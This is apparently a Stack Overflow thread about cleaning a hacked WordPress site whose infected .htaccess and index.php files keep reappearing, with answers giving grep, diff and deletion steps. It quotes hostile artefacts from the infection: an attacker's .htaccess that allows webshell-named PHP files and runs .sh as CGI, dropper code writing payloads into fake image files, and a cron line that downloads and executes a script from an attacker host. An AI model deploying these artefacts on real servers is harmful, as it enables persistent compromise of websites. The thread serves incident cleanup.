# Hacked WordPress .htaccess file

Tags: wordpress, .htaccess, security

I have a WordPress site that features a .htaccess and a file called *postfs.php*.

But when I try to delete them, they are written again. I tried to delete all the files on the site, change permissions, check the cron ... but there isn't anything to do. These files appear as soon as I delete or edit them.

The contents of the file are as follows:

#### File *.htaccess*

```
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$">
    Order allow,deny
    Deny from all
</FilesMatch>

<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.$
    Order allow,deny
    Allow from all
</FilesMatch>

AddType application/x-httpd-cgi .sh

<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . index.php [L]
</IfModule>
```

And the *postfs.php* file has this content: [PHP Decode](https://www.unphp.net/decode/1b6fc6fb520dc744ba13e970d2fd5699/)

How can I avoid the restoring of these files?

Comment: I voted to close this question because it is not a programming question. Rather, it is about cleaning up a hacked WordPress site.

Answer (score 18):

I had the same problem and the antivirus was not able to detect it. And also the problem of automatically creating files was not related to [cron jobs](https://en.wikipedia.org/wiki/Cron), as friends mentioned.

In fact, every time a page is opened from the site, those files are rebuilt.

I have carefully examined the issue and offer the solution.

The problem occurs for both `.htaccess` and `index.php`.

[image: .htaccess infected file]

[image: index.php infected file]

First we search for a keyword in the text of the file (as root):

```
grep -lir "wjsindex.php" ./
```

Output:

```
./wp-admin/images/arrow-rights.png
./wp-includes/images/smilies/icon_crystal.gif
./.htaccess
```

For another file, we search for a keyword in the text:

```
grep -lir "RZXiMOEbYmVH" ./
```

Output:

```
./wp-admin/images/arrow-lefts.png
./index.php
./wp-includes/images/smilies/icon_devil.gif
```

If you look at the contents of these found image files, you will see that they are not images and contain malicious code that exactly matched our two original files.

Sample:

[image: Sample malicious arrow-rights.png file]

[image: Sample malicious arrow-lefts.png file]

We now search for all four files found:

```
grep -lirE "arrow-rights.png|icon_crystal.gif|arrow-lefts.png|icon_devil.gif" ./
```

Output:

```
./wp-includes/load.php
./wp-includes/template-loader.php
```

If you edit these two results files:

At the bottom of the file `load.php` and at the beginning of the file `template-loader.php`, you will see the extra code that needs to be removed. (Starting with `//ckIIbg`)

[image: diff wp-includes/load.php files]

[image: diff wp-includes/template-loader.php files]

To find out more exactly which sections are correct and which are malicious, just replace that file from another WordPress that you are sure is safe and the same version, or find and remove the extra sections with the diff command.

Thus:

```
diff  ./wp-includes/load.php ~healthy/www/wp-includes/load.php
diff  ./wp-includes/template-loader.php ~healthy/www/wp-includes/template-loader.php
```

And as a final step, delete the four malicious image files:

```
rm -f ./wp-admin/images/arrow-rights.png ./wp-includes/images/smilies/icon_crystal.gif ./wp-admin/images/arrow-lefts.png ./wp-includes/images/smilies/icon_devil.gif
```

And also check cronjobs (`/var/spool/cron/username`) for be like this infected line and remove it:

```
* * * * * wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home//username/public_html 24 && rm -f xxxd
```

This code create a `./css/index.php` file and can be deleted.

Comment: I followed the above steps still some of the index file i was able to malicious code inside of wp-content index.php, theme folders

Comment: @AnkitPrajapati Some viruses work differently, and it was an idea to troubleshoot and you may need to take extra steps. Also check your plugins as they may be vulnerable.

Comment: All still you website is regenerating index.php or htaccess
You need to restart your server or Kill all the process that are running for your server

Comment: @NabiK.A.Z. have followed your steps but still keep infected .htaccess file with same code. Is it a cron job issue? Please hel pe as well.

Comment: @PardeepPathania https://stackoverflow.com/questions/67296060/hacked-wordpress-htaccess/71020907?noredirect=1#comment126784029_71020907

Answer (score 7):

We had the same exact hack a while ago.
The first step is to decode the *index.php* file, and after decoding we see that there are four infected image files:

```
file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
```

First delete the infected four images, and check your cron and delete any cron job you didn't create.

Run this in a SSH session to delete all *.htaccess* files within all sub directories:

```
find . -type f -perm 0444 -name ".htaccess" -exec echo rm {} \;
```

Use the default WordPress .htaccess, and index.php files.

After finishing, you can install Wordfence, and activate the firewall, also don't forget to update your WordPress core, plugins, and themes.

Answer (score 3):

In the first step, you should find the shell file (your host provider can do it with antisheller).

1. remove unused theme and plugin in the WordPress installation
2. log in in the SSH area and run this command:

   `find /home/.../wordpres_directory -type f -name ".htaccess" -delete`
3. open the updated page with this link:
   youdomain/tld/wp-admin/update-core.php?action=do-core-reinstall

If you still see the problem, you should do step 2 and 3.

Your server needs a security configuration. Call the host provider to secure the server.

Comment: What is this "antisheller" you speak of? Do you have a reference?

Answer (score 2):

If files start reappearing after you deleted them you should look out for lines of code—often in the *index.php* file—where a time-limit or a [TTL](https://en.wikipedia.org/wiki/Time_to_live) (time to live) is specified, along with a (most of the time) very long line of Base64 code. (These are often recognizable by a couple of shorter lines of code with 'equal-to' signs in the middle.)

The way this works is the time-limit / TTL makes sure all files are held up against a reference set of files located either on another URL or in the web servers cache, and if one is missing it will sync itself back.

One thing you can do to solve this is deleting the script together with restarting Apache and PHP / [nginx](https://en.wikipedia.org/wiki/Nginx). This cleans out the web servers cache.

After that, you can clean out the malicious deny allow rules and stuff that's in the *.htaccess* files and probably other stuff that's lurking between the files and folders of your web application.

Bonus suggestions to really try and solve the actual security issue here:

1. Always make sure *all* software, plugins, modules, themes, etc. is up-to-date. Don't miss out on any security patches!
2. Make sure to change every password on every account providing access to your web application. (don't forget the FTP accounts and backend panels and stuff).
3. Try to run a malware scan (if you have a shared hosting package you might do so through a security plugin, or ask your hosting company to run one)
4. Make sure there aren't any users, plugins, or any other possibly malicious components you've never heard of and haven't installed!
5. At least make sure to check the root folder, all upload folders, and the temporary folders for malicious files.

Answer (score 2):

I solved the problem.

Create a new FTP account and edit *.htaccess* and *index.php* with [FileZilla](https://en.wikipedia.org/wiki/FileZilla). Then you should delete *wp-admin* and upload the new file and folder by a new version of WordPress. Also *wp-include*. And then you can.

Comment: Can what (last sentence)?

Answer (score 0):

You must search for every *.htaccess* file. Use an FTP client and delete it (almost 5000 in my case). Upgrade plugins to solve security breaks.

Comment: Yes, with this command: `find [directory] -type f -name ".htaccess" -delete` like mentioned above.

Answer (score 0):

This was how I solved this:

1. First isolate the website to my IP address so I could work alone.
2. Removed *WP installed*, but kept *wp-content*.
3. Updated *WP manual* through FTP.
4. Repair / recreate DB.
5. Deactivate all plugins.
6. Disable themes. The simplest way is just to temporary change the name on the *themes* folder to *_theme* instead of themes.
7. Update all plugins.
8. Checked active *theme* folder for changed date. I found a folder in my *inc* folder that had a *index.php* and *forge.php*. I removed those.
9. Lastly I checked the *root* folder again and found a folder called *CSS*. I removed that as well since that also had PHP files that did not belong.
10. Removed [.htaccess](https://en.wikipedia.org/wiki/.htaccess) files according to above.
11. Recreated *.htaccess* file.
12. Activated all plugins and themes.
13. Checked once more for file changes if I had missed anything.
14. Allow traffic to site once more and keep an eye on *access.log* for weird requests.

Maybe this wouldn't help everyone, but this worked fine for me and no traces are left.

Answer (score 0):

Ultimately... none of them work. Follow this option and keep monitoring the *.htaccess* and *index.php* files in the respective domain folder where you see this issue.

1. Don’t uninstall or drop the WordPress installation. All the records stored will be gone.
2. Take a backup of the DB file from MySQL, by looking for the DB mapped to the domain
3. Now create a new sub-domain
4. Install WordPress mapped to the sub-domain
5. Import the db to the newly created DB (against the new WordPress instance)
6. Create the respective views... you will have to open the SQL file and change the user / dbname against the views created and manually restore them
7. Once all the above done, now open the table *wpxx_options* and update the two records with the new sub-domain name
8. Now go to WordPress and add the theme which you had installed earlier ***[don’t use a new one]***
9. Install only the required plugins ***and not all as you did earlier installation***
10. go to the *wp_content* folder (from the earlier installation) and get all the media files and copy them to the *wp_content* folder (1999, 2000, 20xx, ...) folders is what I meant and not all
11. finally go to your *wp-config.php* file and change the table prefix to the new one

    ```php
    //$table_prefix = 'wpxx_'; // Old one
    $table_prefix = 'wp1234_'; // New one
    ```

With this I think it should work.

I had tried by removing the files and uninstalling all, including domain and restored... the same junk information gets updated in the two files (*.htaccess* and *index.php)*... so I had to follow the above steps. It’s working for now, and I have to keep monitoring the above files.

Answer (score 0):

You might have a cronjob that keeps on adding the *.htaccess* files. look out for a cronjob with a [Wget](https://en.wikipedia.org/wiki/Wget) request to *hello.turnedpro.xyz*.

If you are using [cPanel](https://en.wikipedia.org/wiki/CPanel), you can reset your cPanel account password and run anti-malware scan for any keyloggers/malware, e.g., *RedLine Stealer*.

Answer (score 0):

I had the very same problem. In my case, I had several WordPress sites under one user. It was very convenient for me to maintain the sites, but it made the clean up more tricky, sort of whack a mole situation.

Both malicious *.htaccess* and index.php were regenerating as soon as they were deleted. What I did was look for all the radio.php and about.php with malicious code (easy to find because they are bigger in size and out of place) and also found some folders called "maint" with files with malicious code. After cleaning this, the *.htaccess* file and *index.php* infected did not regenerate anymore, so after copying the fresh WordPress files, everything was fine, and was able to access *wp-admin* correctly.

In one particular WordPress folder, even deleting all the files, infected *.htaccess* and *index.php* files were still regenerating, so I deleted the root folder containing the WordPress install and created a new one with a different name, and after pointing the domain name to the new folder, voila! All was fine!

Answer (score 0):

Today I found a WordPress 5.7.5 installation infected. All *[.htaccess](https://en.wikipedia.org/wiki/.htaccess)* files had permissions for malicious files in the whole menu panel.

I then backed up everything and found several files with strange names that were infected in the root and other locations. I removed, I changed all the passwords, I downloaded the official installation WordPress 5.7.5, I deleted the WP-admin folder and I sent from the official installation in this Panel normalized.

I could update all the plugins, so I did the same with *WP-includes*. I already requested the *WP-content* the hosting that runs the *find* command to delete all .htaccess files, so I did upgrade to a new version.

Comment: -- I restored like this.